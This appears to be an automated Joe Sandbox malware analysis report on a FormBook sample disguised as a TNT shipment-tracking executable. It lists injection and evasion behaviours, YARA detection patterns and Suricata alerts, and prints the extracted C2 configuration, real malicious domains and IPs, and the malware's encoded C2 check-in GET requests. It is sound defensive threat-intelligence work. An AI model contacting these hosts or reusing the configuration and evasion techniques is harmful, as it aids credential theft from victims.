Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TNT AWB TRACKING DETAILS.exe

Overview

General Information

Sample name:TNT AWB TRACKING DETAILS.exe
Analysis ID:1517909
MD5:b49edb762958e81c098b4869ba26a78c
SHA1:152bda24aa1bd2b8f6eff91f214ebf1701062a7e
SHA256:58892474694c1aff444adca37753e52b93fffce8bb98b75d488ec3df2c87b2da
Tags:exeFormbookTNTuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • TNT AWB TRACKING DETAILS.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: B49EDB762958E81C098B4869BA26A78C)
    • svchost.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • wlanext.exe (PID: 7568 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • cmd.exe (PID: 7644 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.weight-loss-003.today/jd21/"], "decoy": ["bankownedproperties-0.bond", "slab-leak-repair-74697.bond", "tvtwenty20sr.top", "scw-iot.net", "circusenergy.online", "030002787.xyz", "propertiesforrentus11.bond", "defi-banksystem.online", "gkbet168.net", "joycasino-ed46.top", "sctttc-or.top", "borghardt.xyz", "therealtorpeddler.info", "macexpress.online", "bobbyharvey.store", "dating-dd-de.info", "thetrue.one", "alqahtani.site", "mahlubini.africa", "truck-driver-jobs-42274.bond", "packaging-services-17231.xyz", "badcreditloans59.xyz", "cellphonesfxw.today", "applyzentavra.com", "basscolofers.shop", "knee-pain-treatment-140741.xyz", "saltyfashion.shop", "quantive.tech", "cldvpn.sbs", "bolehapasaja16.shop", "nextdoor3.store", "forklift-jobs-29768.bond", "pools-99305.bond", "3780.cyou", "solveiterzsolutions.fun", "key-ring.xyz", "replyingendoplasmed.pro", "infanbs.shop", "apple0ficial-ld.info", "stress-relief-44110.bond", "r86gd377hi.rent", "lww20.top", "apartments-for-rent-series.sbs", "emiratesnseic.top", "senior-living-25596.bond", "hostease.cloud", "walk-in-tubs-30303.bond", "childrenfirstcenter.xyz", "45941978.top", "pw7-golden-painting-ldm.lat", "0yf.com", "tyumk.xyz", "utopartses.com", "hearing-aids-77773.bond", "frametoryframes.shop", "mvtb.pics", "speeddeals.online", "cyber-eu.digital", "hm23s.top", "pools-80761.bond", "2002w.app", "authentication-app-69447.bond", "legendhud.shop", "xmld101.icu"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, ParentProcessId: 7420, ParentProcessName: TNT AWB TRACKING DETAILS.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 7524, ProcessName: svchost.exe
          Sigma detected: Unusual Parent Process For Cmd.EXE
          Source: Process startedAuthor: Tim Rauch: Data: Command: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 7568, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", ProcessId: 7644, ProcessName: cmd.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: `, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe, ParentProcessId: 7420, ParentProcessName: TNT AWB TRACKING DETAILS.exe, ProcessCommandLine: "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe", ProcessId: 7524, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-25T09:07:05.147039+020020314531Malware Command and Control Activity Detected192.168.2.949709185.134.245.11380TCP
          2024-09-25T09:07:45.103010+020020314531Malware Command and Control Activity Detected192.168.2.949711188.114.96.380TCP
          2024-09-25T09:08:26.169273+020020314531Malware Command and Control Activity Detected192.168.2.949712185.53.179.9380TCP
          2024-09-25T09:09:48.966168+020020314531Malware Command and Control Activity Detected192.168.2.949713185.53.179.9280TCP
          2024-09-25T09:10:09.459963+020020314531Malware Command and Control Activity Detected192.168.2.94971477.37.37.3680TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: TNT AWB TRACKING DETAILS.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://www.propertiesforrentus11.bond/jd21/Avira URL Cloud: Label: phishing
          Source: http://www.circusenergy.onlineAvira URL Cloud: Label: malware
          Source: http://www.circusenergy.online/jd21/www.cyber-eu.digitalAvira URL Cloud: Label: malware
          Source: http://www.circusenergy.online/jd21/Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.weight-loss-003.today/jd21/"], "decoy": ["bankownedproperties-0.bond", "slab-leak-repair-74697.bond", "tvtwenty20sr.top", "scw-iot.net", "circusenergy.online", "030002787.xyz", "propertiesforrentus11.bond", "defi-banksystem.online", "gkbet168.net", "joycasino-ed46.top", "sctttc-or.top", "borghardt.xyz", "therealtorpeddler.info", "macexpress.online", "bobbyharvey.store", "dating-dd-de.info", "thetrue.one", "alqahtani.site", "mahlubini.africa", "truck-driver-jobs-42274.bond", "packaging-services-17231.xyz", "badcreditloans59.xyz", "cellphonesfxw.today", "applyzentavra.com", "basscolofers.shop", "knee-pain-treatment-140741.xyz", "saltyfashion.shop", "quantive.tech", "cldvpn.sbs", "bolehapasaja16.shop", "nextdoor3.store", "forklift-jobs-29768.bond", "pools-99305.bond", "3780.cyou", "solveiterzsolutions.fun", "key-ring.xyz", "replyingendoplasmed.pro", "infanbs.shop", "apple0ficial-ld.info", "stress-relief-44110.bond", "r86gd377hi.rent", "lww20.top", "apartments-for-rent-series.sbs", "emiratesnseic.top", "senior-living-25596.bond", "hostease.cloud", "walk-in-tubs-30303.bond", "childrenfirstcenter.xyz", "45941978.top", "pw7-golden-painting-ldm.lat", "0yf.com", "tyumk.xyz", "utopartses.com", "hearing-aids-77773.bond", "frametoryframes.shop", "mvtb.pics", "speeddeals.online", "cyber-eu.digital", "hm23s.top", "pools-80761.bond", "2002w.app", "authentication-app-69447.bond", "legendhud.shop", "xmld101.icu"]}
          Multi AV Scanner detection for submitted file
          Source: TNT AWB TRACKING DETAILS.exeReversingLabs: Detection: 52%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: TNT AWB TRACKING DETAILS.exeJoe Sandbox ML: detected
          Source: TNT AWB TRACKING DETAILS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: wntdll.pdbUGP source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1448562285.0000000004550000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1450733761.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452328610.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.0000000003A3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1510180588.00000000036EF000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1508121602.000000000353E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1449263354.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, TNT AWB TRACKING DETAILS.exe, 00000000.00000003.1448562285.0000000004550000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1450733761.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508845301.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452328610.0000000003200000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.3839397087.0000000003A3E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1510180588.00000000036EF000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3839397087.00000000038A0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1508121602.000000000353E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: svchost.exe, 00000002.00000003.1507427933.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508246439.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1507541868.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.3831257030.00000000006F0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3861185504.000000001040F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.0000000003DEF000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3834313158.00000000032D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3861185504.000000001040F000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.0000000003DEF000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3834313158.00000000032D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000002.00000003.1507427933.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1508246439.0000000002BE0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.1507541868.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.3831257030.00000000006F0000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx2_2_00407B1A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx4_2_030D7B1B

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49712 -> 185.53.179.93:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49712 -> 185.53.179.93:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49712 -> 185.53.179.93:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49709 -> 185.134.245.113:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49709 -> 185.134.245.113:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49709 -> 185.134.245.113:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49711 -> 188.114.96.3:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49711 -> 188.114.96.3:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49711 -> 188.114.96.3:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49713 -> 185.53.179.92:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49713 -> 185.53.179.92:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49714 -> 77.37.37.36:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49713 -> 185.53.179.92:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49714 -> 77.37.37.36:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.9:49714 -> 77.37.37.36:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.weight-loss-003.today/jd21/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.borghardt.xyz
          Source: global trafficHTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=yaFk5fMSAGN82SCLgaCn8ag2pJ39IRNZ6T5Hukk791SUyW8vAMaB+rWiLjqwV1W2V2ID HTTP/1.1Host: www.circusenergy.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp HTTP/1.1Host: www.weight-loss-003.todayConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI HTTP/1.1Host: www.walk-in-tubs-30303.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?Bl=8pSpW470ix&FjUh5xw=b/Dc4UkLHLZk59X8SmhgJ1uv172ipMqzAxiQNMhexpG5XWQ9Iwkd+tXAg5/cR36jPrSP HTTP/1.1Host: www.pools-80761.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix HTTP/1.1Host: www.legendhud.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.53.179.92 185.53.179.92
          Source: Joe Sandbox ViewIP Address: 185.53.179.93 185.53.179.93
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: DOMENESHOPOsloNorwayNO DOMENESHOPOsloNorwayNO
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
